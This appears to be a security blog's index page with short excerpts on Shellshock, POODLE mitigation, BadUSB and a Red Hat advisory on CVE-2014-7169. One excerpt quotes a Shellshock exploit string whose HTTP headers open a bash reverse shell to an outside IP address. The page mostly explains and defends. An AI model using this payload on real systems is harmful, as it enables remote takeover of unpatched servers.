Wednesday evening we ran a bash script command against a lab computer which was designed to be vulnerable Downloaded a system .iso file from http://www.vulnhub.com It is from the Pentester Lab section https://twitter.com/PentesterLab/status/515079459284594688 then started the computer (now I had a test lab computer system) Then ran the above command on a Kali Linux machine … Read more
POODLE (Padding Oracle On Downgraded Legacy Encryption.) is in the news these days, and the fix for it is the following: Internet Storm Center link and the important parts: Apache: Add -SSLv3 to the “SSLProtocol” line. It should already contain -SSLv2 unless you list specific protocols. nginx: list specific allowed protocols in the “ssl_protocols” line. … Read more
What is this BadUSB? Extremetech.com has a story and the Youtube video from BlackHat 2014(not Derbycon as in article) The controller can be hacked and code inserted inside the USB chips themselves. So we have to create good security policies and reduce the chance of plugging in USB devices that we do not know about. … Read more
Google Web Cache of the exploit char *request = “GET %s HTTP/1.0\r\nUser-Agent: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\nCookie: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\nHost: %s\r\nReferer: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\n\r\n”; which as it is explained in the link (by the hacker) is to run a … Read more
RedHat customer portal Red Hat has become aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169. This issue (CVE 2014-6271) has not been resolved on RedHat Operating systems (i.e. no … Read more
